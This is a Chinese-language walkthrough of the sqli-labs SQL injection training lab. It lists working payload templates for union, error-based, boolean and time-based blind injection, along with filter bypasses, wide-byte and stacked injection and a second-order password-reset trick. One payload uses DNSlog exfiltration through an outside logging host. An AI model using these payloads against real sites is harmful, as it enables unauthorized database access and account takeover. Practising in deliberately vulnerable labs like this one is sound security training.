sql-lab 通关笔记

sql-lab

less1-4

1. 加单引号报错得到报错信息

2. 根据报错信息判断闭合条件

3. order by找字段数

4. union select找回显位置

5. 找到回显位置正常爆数据

6. 相同类型其他关卡
   
   

后端代码分析

GET方式获取id，单引号闭合，将查询到的数据输出到页面上

less5-10

1. 加单引号得到报错信息

2. 根据报错信息判断闭合条件

3. order by找字段数

4. union select没有回显位置
   
   

盲注

1. 基于floor报错的盲注
   
   原理是利用group by 处理rand 函数进行处理时，会多次对同一列进行查询，返回duplicate key 错误

利用公式

union Select 1,count(*),concat(你希望的查询语句,floor(rand(0)*2))a from information_schema.columns group by a--+

1. updatexml报错注入

利用公式

and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)--+

1. extractvalue报错注入

利用公式

and extractvalue(1, concat(0x7e, (select @@version),0x7e))--+

updatexml和extractvalue 在MySQL 5.1.5版本及以后版本中用于对XML文件进行处理，当Xpath 路径出错时会报错。

3. 基于bool判断的盲注

利用公式

' or Length(database()) = 8--+

根据页面是否返回正常判断bool判断是否正确。

4. 基于时间的盲注

利用公式

'  and if((select length(database())>7)>0,sleep(5),null) --+

sleep()和benchmark()可以用于延时注入，根据页面响应时间判断是否正确。

5. DNSlog平台盲注

DNSlog注入原理通过子查询，将内容拼接到域名内，让load_file()去访问共享文件，访问的域名被记录此时变为显错注入,将盲注变显错注入,读取远程共享文件，通过拼接出函数做查询,拼接到域名中，访问时将访问服务器，记录后查看日志。可用于SQL注入中的盲注，XSS盲打，无回显的命令执行，无回显的SSRF，无回显的XXE（Blind XXE）。用于SQL盲注时需要满足secure_file_priv 为空。

利用公式

' and load_file(concat('\\\\',(select database()),'.**.ceye.io\\sql'))--+

sql-lab利用DNSlog平台注入

后端代码分析

GET方式获取id，单引号闭合，如果在数据库中查询到相关信息，返回特定信息作为flag，否则返回数据库错误信息。

less11-14

post 类型联合查询注入

1.判断

2.爆数据

3.后端代码分析

POST方式获取用户名和密码，单引号闭合，并将查询的数据显示在页面上。

post 类型盲注

1.判断

2.爆数据

3.后端代码分析

POST方式获取用户名和密码，单引号闭合，查询的数据不显示在页面上，只显示一个登陆成功的图片。

less15-16

没有错误回显时，可以借助or 1=1或者and 1=1以及order by判断闭合方式，有查询内容回显时也可以借助union select共同判断。

没有错误回显也没有内容回显，不能使用报错注入，只能使用布尔和时间盲注。

1. 判断闭合
   
   

2.爆数据

3.后端代码分析

POST方式获取用户名和密码，单引号闭合，查询的数据不显示在页面上，只显示一个登陆成功的图片，不显示报错信息。

less17-22

不同注入点的注入类型

注入点在password 处

常见重置密码等数据库更新数据库的情况下

1.判断

2.爆数据

3.后端代码分析

POST方式获取用户名，然后再在更新密码处拼合，所以注入点在password。

注入点在usagent 处

1.注入单引号闭合，不能使用连接符+连接语句，不能使用注释符闭合。

2.后端代码分析

先获取用户名，在将ip信息和usagent信息插入数据库，原查询语句有过滤，所以没有漏洞。

注入点在referer 处

1.注入单引号闭合，不能使用连接符+连接语句，不能使用注释符闭合。

2.后端代码分析

先获取用户名，在将referer信息和usagent信息插入数据库，原查询语句有过滤，所以没有漏洞。

注入点在cookie 处

1.注入单引号闭合，不能使用连接符+连接语句，不能使用注释符闭合。

2.后端代码分析

前面查询用户的数据处做了过滤，后面又通过cookie 查询数据，存在注入。

cookie 注入base64编码

1.注入单引号闭合，不能使用连接符+连接语句，不能使用注释符闭合，对注入语句进行base64编码。

2.后端代码分析

主要对cookie 进行了base64编码

less23-28a

过滤绕过

过滤注释符

1.注入单引号闭合，不能使用注释符，使用and 和or 闭合语句。

2.后端代码分析

过滤了注释符

二次注入绕过过滤

1.注册一个新账号admin'#

2.修改新注册账号admin'# 的密码

3.实际上修改了admin 的密码

4.后端代码分析

通过注释符更新其他用户密码

过滤and和or

1.双写绕过

2.后端代码分析

匹配一次并替换成空格

过滤一大堆

1.and和or双写绕过，单引号闭合代替注释，括号代替空格，盲注

2.后端代码分析

过滤了一大堆

less29-31

两层服务架构，参数污染绕WAF

https://blog.csdn.net/m0_54899775/article/details/122156208

less32-37

宽字节注入

1.通过%bf或者其他ascii码大于128的字符进行绕过

2.后端代码分析

addslashes函数转换' 为'

post 类型宽字节注入

1.将 utf-8 转换为 utf-16 或 utf-32，例如将 '转为 utf-16 为 � ' ，进行注入

https://www.cnblogs.com/bmjoker/p/9134830.html

less38-45

堆叠注入

用户采用PDO编程（ POD（PHP Data Object））且没有对参数进行过滤

mysqli_multi_query()函数也可以造成堆叠注入

https://blog.csdn.net/weixin_42530572/article/details/106439380

1.堆叠插入一条数据。

2.后端代码分析

使用函数mysqli_multi_query()，可同时执行多条sql语句

post类型堆叠注入

1.堆叠插入一条数据

http://bc.twsec.com.cn/sqli1/Less-42/login.php

less46-53

order by语句与limit语句的注入

order by 注入

1.报错注入

2.后端代码分析

order by 后面是注入点，不能使用union select 注入，使用报错注入或盲注

https://blog.csdn.net/m0_54899775/article/details/122202855

less54-75

前面的内容，练习巩固。